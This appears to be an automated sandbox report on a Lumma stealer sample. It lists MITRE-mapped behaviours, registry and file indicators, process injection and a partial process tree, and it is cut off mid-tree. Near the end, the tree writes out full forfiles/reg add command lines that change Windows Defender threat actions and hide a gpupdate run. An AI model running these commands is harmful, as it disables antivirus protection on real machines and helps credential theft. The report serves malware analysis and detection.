lumma | 04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation	lk9Ldxrg3RRzMhQo5WbjR_Uy.exe

Executes dropped EXE 11 IoCs

pid	Process
2228	HLRTzezunT2Ovldb8V_kvkmU.exe
780	lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
1480	1TcV9bBuQfLHLuk8CggizKpL.exe
1816	NBgv1H4QcTrdOqAY8RuX3Rzz.exe
1664	Install.exe
2312	Install.exe
912	service123.exe
2932	ccGDScQhwtMv7tbRf1m2JKtr.exe
568	EBAFBGIDHC.exe
2720	service123.exe
816	TcPDtnB.exe

Indirect Command Execution 1 TTPs 12 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
912	forfiles.exe
2480	forfiles.exe
1568	forfiles.exe
1780	forfiles.exe
2984	forfiles.exe
1104	forfiles.exe
328	forfiles.exe
2404	forfiles.exe
2376	forfiles.exe
2184	forfiles.exe
1940	forfiles.exe
2072	forfiles.exe

Loads dropped DLL 34 IoCs

pid	Process
548	RegAsm.exe
548	RegAsm.exe
2228	HLRTzezunT2Ovldb8V_kvkmU.exe
2228	HLRTzezunT2Ovldb8V_kvkmU.exe
2228	HLRTzezunT2Ovldb8V_kvkmU.exe
548	RegAsm.exe
548	RegAsm.exe
548	RegAsm.exe
548	RegAsm.exe
2228	HLRTzezunT2Ovldb8V_kvkmU.exe
1664	Install.exe
1664	Install.exe
1664	Install.exe
1664	Install.exe
2312	Install.exe
2312	Install.exe
2312	Install.exe
1480	1TcV9bBuQfLHLuk8CggizKpL.exe
1816	NBgv1H4QcTrdOqAY8RuX3Rzz.exe
1816	NBgv1H4QcTrdOqAY8RuX3Rzz.exe
912	service123.exe
780	lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
1384	WerFault.exe
1384	WerFault.exe
1384	WerFault.exe
1992	MSBuild.exe
1992	MSBuild.exe
1992	MSBuild.exe
1992	MSBuild.exe
1992	MSBuild.exe
2732	WerFault.exe
2732	WerFault.exe
2732	WerFault.exe
2720	service123.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ipinfo.io
11	api.myip.com
12	api.myip.com
33	ipinfo.io
3	api64.ipify.org
4	api64.ipify.org
6	ipinfo.io
29	api64.ipify.org
34	ipinfo.io
37	api.myip.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	TcPDtnB.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	TcPDtnB.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	TcPDtnB.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	TcPDtnB.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2172 set thread context of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2932 set thread context of 1992	2932	ccGDScQhwtMv7tbRf1m2JKtr.exe	74
PID 568 set thread context of 1640	568	EBAFBGIDHC.exe	78

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bPUtwrklxNafuwbpPq.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1384	2932	WerFault.exe	73
2732	568	WerFault.exe	77

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NBgv1H4QcTrdOqAY8RuX3Rzz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ccGDScQhwtMv7tbRf1m2JKtr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1TcV9bBuQfLHLuk8CggizKpL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	NBgv1H4QcTrdOqAY8RuX3Rzz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	NBgv1H4QcTrdOqAY8RuX3Rzz.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1396	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	TcPDtnB.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000010070eecf615db01	TcPDtnB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	TcPDtnB.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	TcPDtnB.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	TcPDtnB.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0df38ecf615db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2616	schtasks.exe
2160	schtasks.exe
2624	schtasks.exe
1520	schtasks.exe
2604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
780	lk9Ldxrg3RRzMhQo5WbjR_Uy.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
2544	powershell.exe
1992	MSBuild.exe
1992	MSBuild.exe
1992	MSBuild.exe
1992	MSBuild.exe
2064	powershell.exe
2064	powershell.exe
2064	powershell.exe
932	powershell.EXE
932	powershell.EXE
932	powershell.EXE
3032	powershell.EXE
3032	powershell.EXE
3032	powershell.EXE
2332	powershell.exe
1804	powershell.EXE
1804	powershell.EXE
1804	powershell.EXE

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeIncreaseQuotaPrivilege	2080	WMIC.exe
Token: SeSecurityPrivilege	2080	WMIC.exe
Token: SeTakeOwnershipPrivilege	2080	WMIC.exe
Token: SeLoadDriverPrivilege	2080	WMIC.exe
Token: SeSystemProfilePrivilege	2080	WMIC.exe
Token: SeSystemtimePrivilege	2080	WMIC.exe
Token: SeProfSingleProcessPrivilege	2080	WMIC.exe
Token: SeIncBasePriorityPrivilege	2080	WMIC.exe
Token: SeCreatePagefilePrivilege	2080	WMIC.exe
Token: SeBackupPrivilege	2080	WMIC.exe
Token: SeRestorePrivilege	2080	WMIC.exe
Token: SeShutdownPrivilege	2080	WMIC.exe
Token: SeDebugPrivilege	2080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2080	WMIC.exe
Token: SeRemoteShutdownPrivilege	2080	WMIC.exe
Token: SeUndockPrivilege	2080	WMIC.exe
Token: SeManageVolumePrivilege	2080	WMIC.exe
Token: 33	2080	WMIC.exe
Token: 34	2080	WMIC.exe
Token: 35	2080	WMIC.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	932	powershell.EXE
Token: SeDebugPrivilege	3032	powershell.EXE
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2288	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2288	WMIC.exe
Token: SeSecurityPrivilege	2288	WMIC.exe
Token: SeTakeOwnershipPrivilege	2288	WMIC.exe
Token: SeLoadDriverPrivilege	2288	WMIC.exe
Token: SeSystemtimePrivilege	2288	WMIC.exe
Token: SeBackupPrivilege	2288	WMIC.exe
Token: SeRestorePrivilege	2288	WMIC.exe
Token: SeShutdownPrivilege	2288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2288	WMIC.exe
Token: SeUndockPrivilege	2288	WMIC.exe
Token: SeManageVolumePrivilege	2288	WMIC.exe
Token: SeDebugPrivilege	1804	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 2172 wrote to memory of 548	2172	04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe	31
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 2228	548	RegAsm.exe	34
PID 548 wrote to memory of 780	548	RegAsm.exe	35
PID 548 wrote to memory of 780	548	RegAsm.exe	35
PID 548 wrote to memory of 780	548	RegAsm.exe	35
PID 548 wrote to memory of 780	548	RegAsm.exe	35
PID 548 wrote to memory of 1480	548	RegAsm.exe	36
PID 548 wrote to memory of 1480	548	RegAsm.exe	36
PID 548 wrote to memory of 1480	548	RegAsm.exe	36
PID 548 wrote to memory of 1480	548	RegAsm.exe	36
PID 548 wrote to memory of 1816	548	RegAsm.exe	37
PID 548 wrote to memory of 1816	548	RegAsm.exe	37
PID 548 wrote to memory of 1816	548	RegAsm.exe	37
PID 548 wrote to memory of 1816	548	RegAsm.exe	37
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 2228 wrote to memory of 1664	2228	HLRTzezunT2Ovldb8V_kvkmU.exe	38
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 1664 wrote to memory of 2312	1664	Install.exe	39
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2312 wrote to memory of 2220	2312	Install.exe	40
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 2220 wrote to memory of 912	2220	cmd.exe	42
PID 912 wrote to memory of 1004	912	forfiles.exe	43
PID 912 wrote to memory of 1004	912	forfiles.exe	43
PID 912 wrote to memory of 1004	912	forfiles.exe	43

C:\Users\Admin\AppData\Local\Temp\04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe
"C:\Users\Admin\AppData\Local\Temp\04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Users\Admin\Documents\iofolko5\HLRTzezunT2Ovldb8V_kvkmU.exe
    C:\Users\Admin\Documents\iofolko5\HLRTzezunT2Ovldb8V_kvkmU.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Users\Admin\AppData\Local\Temp\7zS277E.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1664
    - - C:\Users\Admin\AppData\Local\Temp\7zS2C9C.tmp\Install.exe
        
        .\Install.exe /JgvdidbZmp "385121" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        Suspicious use of WriteProcessMemory
        
        PID:2312
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2220
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        Suspicious use of WriteProcessMemory
        
        PID:912
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1004
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:1568
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:1828
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        
        PID:2480
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2184
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2988
        
        C:\Windows\SysWOW64\forfiles.exe
        
